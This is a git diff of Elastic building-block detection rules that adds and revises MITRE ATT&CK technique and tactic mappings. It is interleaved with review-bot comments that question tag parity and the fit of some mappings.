 [[rule.threat.technique]]
 id = "T1069"
 name = "Permission Groups Discovery"
 reference = "https://attack.mitre.org/techniques/T1069/"
+[[rule.threat.technique.subtechnique]]
+id = "T1069.002"
+name = "Domain Groups"
+reference = "https://attack.mitre.org/techniques/T1069/002/"
 [rule.threat.tactic]
 id = "TA0007"
 name = "Discovery"
 reference = "https://attack.mitre.org/tactics/TA0007/"
-
diff --git a/rules_building_block/discovery_posh_generic.toml b/rules_building_block/discovery_posh_generic.toml
index d25af55f2b8..f6b29067589 100644
--- a/rules_building_block/discovery_posh_generic.toml
+++ b/rules_building_block/discovery_posh_generic.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/07/06"
 integration = ["windows"]
 maturity = "production"
-updated_date = "2026/02/09"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -201,6 +201,7 @@ value = "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Prot
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1007"
 name = "System Service Discovery"
@@ -211,6 +212,11 @@ id = "T1012"
 name = "Query Registry"
 reference = "https://attack.mitre.org/techniques/T1012/"
+[[rule.threat.technique]]
+id = "T1016"
+name = "System Network Configuration Discovery"
+reference = "https://attack.mitre.org/techniques/T1016/"
+
 [[rule.threat.technique]]
 id = "T1049"
 name = "System Network Connections Discovery"
@@ -222,9 +228,19 @@ name = "Process Discovery"
 reference = "https://attack.mitre.org/techniques/T1057/"
 [[rule.threat.technique]]
-id = "T1082"
-name = "System Information Discovery"
-reference = "https://attack.mitre.org/techniques/T1082/"
+id = "T1069"
+name = "Permission Groups Discovery"
+reference = "https://attack.mitre.org/techniques/T1069/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1069.001"
+name = "Local Groups"
+reference = "https://attack.mitre.org/techniques/T1069/001/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1069.002"
+name = "Domain Groups"
+reference = "https://attack.mitre.org/techniques/T1069/002/"
 [[rule.threat.technique]]
 id = "T1082"
@@ -240,6 +256,7 @@ reference = "https://attack.mitre.org/techniques/T1083/"
 id = "T1087"
 name = "Account Discovery"
 reference = "https://attack.mitre.org/techniques/T1087/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1087.001"
 name = "Local Account"
@@ -250,7 +267,6 @@ id = "T1087.002"
 name = "Domain Account"
 reference = "https://attack.mitre.org/techniques/T1087/002/"
-
 [[rule.threat.technique]]
 id = "T1135"
 name = "Network Share Discovery"
@@ -270,37 +286,36 @@ reference = "https://attack.mitre.org/techniques/T1482/"
 id = "T1518"
 name = "Software Discovery"
 reference = "https://attack.mitre.org/techniques/T1518/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1518.001"
 name = "Security Software Discovery"
 reference = "https://attack.mitre.org/techniques/T1518/001/"
-
 [[rule.threat.technique]]
 id = "T1615"
 name = "Group Policy Discovery"
 reference = "https://attack.mitre.org/techniques/T1615/"
-
 [rule.threat.tactic]
 id = "TA0007"
 name = "Discovery"
 reference = "https://attack.mitre.org/tactics/TA0007/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1059.001"
 name = "PowerShell"
 reference = "https://attack.mitre.org/techniques/T1059/001/"
-
-
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
-
diff --git a/rules_building_block/discovery_posh_password_policy.toml b/rules_building_block/discovery_posh_password_policy.toml
index fe12f739745..c0d2b23ed0b 100644
--- a/rules_building_block/discovery_posh_password_policy.toml
+++ b/rules_building_block/discovery_posh_password_policy.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/07/12"
 integration = ["windows"]
 maturity = "production"
-updated_date = "2026/02/09"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -142,34 +142,52 @@ not user.id : "S-1-5-18"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1201"
 name = "Password Policy Discovery"
 reference = "https://attack.mitre.org/techniques/T1201/"
-
 [rule.threat.tactic]
 id = "TA0007"
 name = "Discovery"
 reference = "https://attack.mitre.org/tactics/TA0007/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1059.001"
 name = "PowerShell"
 reference = "https://attack.mitre.org/techniques/T1059/001/"
-
-
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1552"
+name = "Unsecured Credentials"
+reference = "https://attack.mitre.org/techniques/T1552/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1552.006"
+name = "Group Policy Preferences"
+reference = "https://attack.mitre.org/techniques/T1552/006/"
+
+[rule.threat.tactic]
+id = "TA0006"
+name = "Credential Access"
+reference = "https://attack.mitre.org/tactics/TA0006/"
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules_building_block/discovery_potential_memory_seeking_activity.toml b/rules_building_block/discovery_potential_memory_seeking_activity.toml
index 1296b79194d..2640548bf2c 100644
--- a/rules_building_block/discovery_potential_memory_seeking_activity.toml
+++ b/rules_building_block/discovery_potential_memory_seeking_activity.toml
@@ -3,7 +3,7 @@ bypass_bbr_timing = true
 creation_date = "2024/02/01"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/12/24"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -70,3 +70,16 @@ reference = "https://attack.mitre.org/techniques/T1057/"
 id = "TA0007"
 name = "Discovery"
 reference = "https://attack.mitre.org/tactics/TA0007/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1005"
+name = "Data from Local System"
+reference = "https://attack.mitre.org/techniques/T1005/"
+
+[rule.threat.tactic]
+id = "TA0009"
+name = "Collection"
+reference = "https://attack.mitre.org/tactics/TA0009/"
diff --git a/rules_building_block/discovery_remote_system_discovery_commands_windows.toml b/rules_building_block/discovery_remote_system_discovery_commands_windows.toml
index 49272de507f..8244aa0061e 100644
--- a/rules_building_block/discovery_remote_system_discovery_commands_windows.toml
+++ b/rules_building_block/discovery_remote_system_discovery_commands_windows.toml
@@ -3,7 +3,7 @@ bypass_bbr_timing = true
 creation_date = "2020/12/04"
 integration = ["endpoint", "windows"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -93,6 +93,7 @@ process where host.os.type == "windows" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1016"
 name = "System Network Configuration Discovery"
@@ -103,9 +104,17 @@ id = "T1018"
 name = "Remote System Discovery"
 reference = "https://attack.mitre.org/techniques/T1018/"
+[[rule.threat.technique]]
+id = "T1069"
+name = "Permission Groups Discovery"
+reference = "https://attack.mitre.org/techniques/T1069/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1069.002"
+name = "Domain Groups"
+reference = "https://attack.mitre.org/techniques/T1069/002/"
 [rule.threat.tactic]
 id = "TA0007"
 name = "Discovery"
 reference = "https://attack.mitre.org/tactics/TA0007/"
-
diff --git a/rules_building_block/discovery_system_network_connections.toml b/rules_building_block/discovery_system_network_connections.toml
index b226cb4c1aa..0493b25927c 100644
--- a/rules_building_block/discovery_system_network_connections.toml
+++ b/rules_building_block/discovery_system_network_connections.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/07/11"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/03/02"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -45,6 +45,11 @@ not (
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1016"
+name = "System Network Configuration Discovery"
+reference = "https://attack.mitre.org/techniques/T1016/"
+
 [[rule.threat.technique]]
 id = "T1049"
 name = "System Network Connections Discovery"
@@ -54,7 +59,6 @@ reference = "https://attack.mitre.org/techniques/T1049/"
 id = "TA0007"
 name = "Discovery"
 reference = "https://attack.mitre.org/tactics/TA0007/"
-
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["process.parent.executable", "process.command_line", "host.id"]
diff --git a/rules_building_block/discovery_system_service_discovery.toml b/rules_building_block/discovery_system_service_discovery.toml
index 4810cc175fd..335cba1ca7b 100644
--- a/rules_building_block/discovery_system_service_discovery.toml
+++ b/rules_building_block/discovery_system_service_discovery.toml
@@ -3,7 +3,7 @@ bypass_bbr_timing = true
 creation_date = "2023/01/24"
 integration = ["windows", "endpoint", "system"]
 maturity = "production"
-updated_date = "2025/12/17"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -70,14 +70,23 @@ process where host.os.type == "windows" and event.type == "start" and process.pa
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1007"
 name = "System Service Discovery"
 reference = "https://attack.mitre.org/techniques/T1007/"
+[[rule.threat.technique]]
+id = "T1057"
+name = "Process Discovery"
+reference = "https://attack.mitre.org/techniques/T1057/"
+
+[[rule.threat.technique]]
+id = "T1135"
+name = "Network Share Discovery"
+reference = "https://attack.mitre.org/techniques/T1135/"
 [rule.threat.tactic]
 id = "TA0007"
 name = "Discovery"
 reference = "https://attack.mitre.org/tactics/TA0007/"
-
diff --git a/rules_building_block/discovery_system_time_discovery.toml b/rules_building_block/discovery_system_time_discovery.toml
index 4966907e28e..10d34aea977 100644
--- a/rules_building_block/discovery_system_time_discovery.toml
+++ b/rules_building_block/discovery_system_time_discovery.toml
@@ -3,7 +3,7 @@ bypass_bbr_timing = true
 creation_date = "2023/01/24"
 integration = ["windows", "endpoint", "system"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -54,14 +54,18 @@ process where host.os.type == "windows" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1124"
 name = "System Time Discovery"
 reference = "https://attack.mitre.org/techniques/T1124/"
+[[rule.threat.technique]]
+id = "T1614"
+name = "System Location Discovery"
+reference = "https://attack.mitre.org/techniques/T1614/"
 [rule.threat.tactic]
 id = "TA0007"
 name = "Discovery"
 reference = "https://attack.mitre.org/tactics/TA0007/"
-
diff --git a/rules_building_block/discovery_win_network_connections.toml b/rules_building_block/discovery_win_network_connections.toml
index dc1f9d25751..96787e5026b 100644
--- a/rules_building_block/discovery_win_network_connections.toml
+++ b/rules_building_block/discovery_win_network_connections.toml
@@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/07/14" integration = ["endpoint"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -52,6 +52,12 @@ process where event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1016" +name = "System Network Configuration Discovery" +reference = "https://attack.mitre.org/techniques/T1016/" + [[rule.threat.technique]] id = "T1049" name = "System Network Connections Discovery" @@ -62,9 +68,12 @@ id = "T1082" name = "System Information Discovery" reference = "https://attack.mitre.org/techniques/T1082/" +[[rule.threat.technique]] +id = "T1087" +name = "Account Discovery" +reference = "https://attack.mitre.org/techniques/T1087/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules_building_block/discovery_windows_system_information_discovery.toml b/rules_building_block/discovery_windows_system_information_discovery.toml index c2deaf4223a..a1f44fc1912 100644 --- a/rules_building_block/discovery_windows_system_information_discovery.toml +++ b/rules_building_block/discovery_windows_system_information_discovery.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/07/06" integration = ["windows", "endpoint", "system"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -62,14 +62,36 @@ process.parent.executable : ( [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1082" name = "System Information Discovery" reference = "https://attack.mitre.org/techniques/T1082/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1047" +name = "Windows Management Instrumentation" +reference = "https://attack.mitre.org/techniques/T1047/" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules_building_block/execution_github_new_event_action_for_pat.toml b/rules_building_block/execution_github_new_event_action_for_pat.toml index 481941c1220..948e55f7d53 100644 --- a/rules_building_block/execution_github_new_event_action_for_pat.toml +++ b/rules_building_block/execution_github_new_event_action_for_pat.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2025/12/24" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
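Review bot: The appended `[[rule.threat]]` block introduces the Execution tactic (TA0002) to this rule, but the rule's `tags` array is not touched anywhere in this file's diff, so unless `Tactic: Execution` is already present or added in a hunk outside this view the rule's tags and its threat tactics now disagree. If the test suite enforces parity between threat tactics and `Tactic:` tags (tests/test_all_rules.py in this series appears to), these files will fail that check. The same gap applies to every file in this batch that appends a `[[rule.threat]]` with a tactic the rule did not previously carry: execution_github_new_event_action_for_pat (Defense Evasion, Persistence), execution_github_new_repo_interaction_for_pat (Defense Evasion), execution_github_new_repo_interaction_for_user (Collection), execution_github_repo_created (Resource Development), execution_github_repo_interaction_from_new_ip (Collection, Initial Access), execution_settingcontent_ms_file_creation (Defense Evasion), execution_unsigned_service_executable (Persistence), initial_access_aws_signin_token_created, initial_access_github_new_ip_address_for_pat, initial_access_github_new_user_agent_for_pat and persistence_github_new_pat_for_user (Defense Evasion), and lateral_movement_unusual_process_sql_accounts (Execution, Initial Access). Either add the matching `Tactic: …` tag to each of these rules in the same commit, or state why the tag is intentionally omitted.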
@@ -37,17 +37,52 @@ github.programmatic_access_type:("OAuth access token" or "Fine-grained personal [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1648" name = "Serverless Execution" reference = "https://attack.mitre.org/techniques/T1648/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.new_terms] field = "new_terms_fields" value = ["github.hashed_token", "event.action"] diff --git a/rules_building_block/execution_github_new_repo_interaction_for_pat.toml b/rules_building_block/execution_github_new_repo_interaction_for_pat.toml index cb75d586d8b..a8e01f3fedc 100644 --- a/rules_building_block/execution_github_new_repo_interaction_for_pat.toml +++ b/rules_building_block/execution_github_new_repo_interaction_for_pat.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2025/12/24" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
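Review bot: T1098.001 Additional Cloud Credentials under Persistence (TA0003) looks mismatched for this rule: the hunk's own context shows it is a new-terms rule over `github.hashed_token` and `event.action` filtered on `github.programmatic_access_type`, which appears to fire when an existing token performs a new kind of action, not when a credential is created. Persistence via a newly issued PAT is already the subject of persistence_github_new_pat_for_user.toml, so this mapping would double-count that coverage in ATT&CK reports. The T1550.001 / Defense Evasion entry is consistent with use of an existing token and can stay. Consider dropping the third `[[rule.threat]]` block or replacing the technique with one the rule's query actually evidences.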
@@ -38,17 +38,34 @@ github.repository_public:false [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1648" name = "Serverless Execution" reference = "https://attack.mitre.org/techniques/T1648/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.new_terms] field = "new_terms_fields" value = ["github.hashed_token", "github.repo"] diff --git a/rules_building_block/execution_github_new_repo_interaction_for_user.toml b/rules_building_block/execution_github_new_repo_interaction_for_user.toml index ba867350a28..896a0dcf8b3 100644 --- a/rules_building_block/execution_github_new_repo_interaction_for_user.toml +++ b/rules_building_block/execution_github_new_repo_interaction_for_user.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2025/12/24" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -37,17 +37,34 @@ github.repository_public:false [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1648" name = "Serverless Execution" reference = "https://attack.mitre.org/techniques/T1648/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1213" +name = "Data from Information Repositories" +reference = "https://attack.mitre.org/techniques/T1213/" + +[[rule.threat.technique.subtechnique]] +id = "T1213.003" +name = "Code Repositories" +reference = "https://attack.mitre.org/techniques/T1213/003/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" [rule.new_terms] field = "new_terms_fields" value = ["user.name", "github.repo"] diff --git a/rules_building_block/execution_github_repo_created.toml b/rules_building_block/execution_github_repo_created.toml index 0b5f2635db1..a7e65405fa1 100644 --- a/rules_building_block/execution_github_repo_created.toml +++ b/rules_building_block/execution_github_repo_created.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -35,14 +35,31 @@ configuration where event.dataset == "github.audit" and event.action == "repo.cr [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1648" name = "Serverless Execution" reference = "https://attack.mitre.org/techniques/T1648/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1583" +name = "Acquire Infrastructure" +reference = "https://attack.mitre.org/techniques/T1583/" + +[[rule.threat.technique.subtechnique]] +id = "T1583.006" +name = "Web Services" +reference = "https://attack.mitre.org/techniques/T1583/006/" + +[rule.threat.tactic] +id = "TA0042" +name = "Resource Development" +reference = "https://attack.mitre.org/tactics/TA0042/" diff --git a/rules_building_block/execution_github_repo_interaction_from_new_ip.toml b/rules_building_block/execution_github_repo_interaction_from_new_ip.toml index 33a822c8378..c048fbf59d9 100644 --- a/rules_building_block/execution_github_repo_interaction_from_new_ip.toml +++ b/rules_building_block/execution_github_repo_interaction_from_new_ip.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2025/12/24" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -37,17 +37,52 @@ github.repository_public:false [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1648" name = "Serverless Execution" reference = "https://attack.mitre.org/techniques/T1648/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1213" +name = "Data from Information Repositories" +reference = "https://attack.mitre.org/techniques/T1213/" + +[[rule.threat.technique.subtechnique]] +id = "T1213.003" +name = "Code Repositories" +reference = "https://attack.mitre.org/techniques/T1213/003/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" [rule.new_terms] field = "new_terms_fields" value = ["github.repo", "github.actor_ip"] diff --git a/rules_building_block/execution_linux_segfault.toml b/rules_building_block/execution_linux_segfault.toml index e1d006ca679..b62d4a8eb19 100644 --- a/rules_building_block/execution_linux_segfault.toml +++ b/rules_building_block/execution_linux_segfault.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/26" integration = ["system"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -58,8 +58,12 @@ host.os.type:linux and event.dataset:"system.syslog" and process.name:kernel and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules_building_block/execution_settingcontent_ms_file_creation.toml b/rules_building_block/execution_settingcontent_ms_file_creation.toml index 1c014464624..b6b5b084656 100644 --- a/rules_building_block/execution_settingcontent_ms_file_creation.toml +++ b/rules_building_block/execution_settingcontent_ms_file_creation.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/08/24" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
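Review bot: T1203 Exploitation for Client Execution is a narrow mapping for a generic segfault signal; the hunk header shows the rule matches `process.name:kernel` syslog events, which cover crashing server daemons and setuid binaries as much as client applications. If the intent is "a process crashed in a way consistent with exploitation", the specific technique is an inference the log line does not support, and the previous tactic-only mapping (or a rule note explaining the choice) would be more honest than T1203. The same T1203 addition appears in execution_settingcontent_ms_file_creation.toml, where a SettingContent-ms file creation is user execution and proxy execution (the T1204.002 and T1218 mappings already in that hunk) rather than an exploit, so it looks out of place there too. Both mappings deserve a second look before they feed coverage metrics.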
@@ -46,36 +46,54 @@ file where host.os.type == "windows" and event.type == "creation" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" + [[rule.threat.technique]] id = "T1204" name = "User Execution" reference = "https://attack.mitre.org/techniques/T1204/" + [[rule.threat.technique.subtechnique]] id = "T1204.002" name = "Malicious File" reference = "https://attack.mitre.org/techniques/T1204/002/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.001" name = "Spearphishing Attachment" reference = "https://attack.mitre.org/techniques/T1566/001/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules_building_block/execution_unsigned_service_executable.toml b/rules_building_block/execution_unsigned_service_executable.toml index 3a861c4ab50..46bb49f0048 100644 --- a/rules_building_block/execution_unsigned_service_executable.toml +++ b/rules_building_block/execution_unsigned_service_executable.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/07/14" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -42,39 +42,57 @@ not process.code_signature.status : (errorCode_endpoint* or "errorChaining") [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1569" name = "System Services" reference = "https://attack.mitre.org/techniques/T1569/" + [[rule.threat.technique.subtechnique]] id = "T1569.002" name = "Service Execution" reference = "https://attack.mitre.org/techniques/T1569/002/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.001" name = "Invalid Code Signature" reference = "https://attack.mitre.org/techniques/T1036/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique.subtechnique]] +id = "T1543.003" +name = "Windows Service" +reference = "https://attack.mitre.org/techniques/T1543/003/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.new_terms] field = "new_terms_fields" value = ["host.id", "process.executable", "user.id"] diff --git a/rules_building_block/initial_access_aws_signin_token_created.toml b/rules_building_block/initial_access_aws_signin_token_created.toml index 2b8d3f7be02..46967d3819e 100644 --- a/rules_building_block/initial_access_aws_signin_token_created.toml +++ b/rules_building_block/initial_access_aws_signin_token_created.toml 
@@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2025/10/09" integration = ["aws"] maturity = "production" -updated_date = "2025/10/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -52,22 +52,39 @@ event.dataset: "aws.cloudtrail" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules_building_block/initial_access_github_new_ip_address_for_pat.toml b/rules_building_block/initial_access_github_new_ip_address_for_pat.toml index b441c6147ea..472759c3b15 100644 --- a/rules_building_block/initial_access_github_new_ip_address_for_pat.toml +++ b/rules_building_block/initial_access_github_new_ip_address_for_pat.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2025/12/24" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
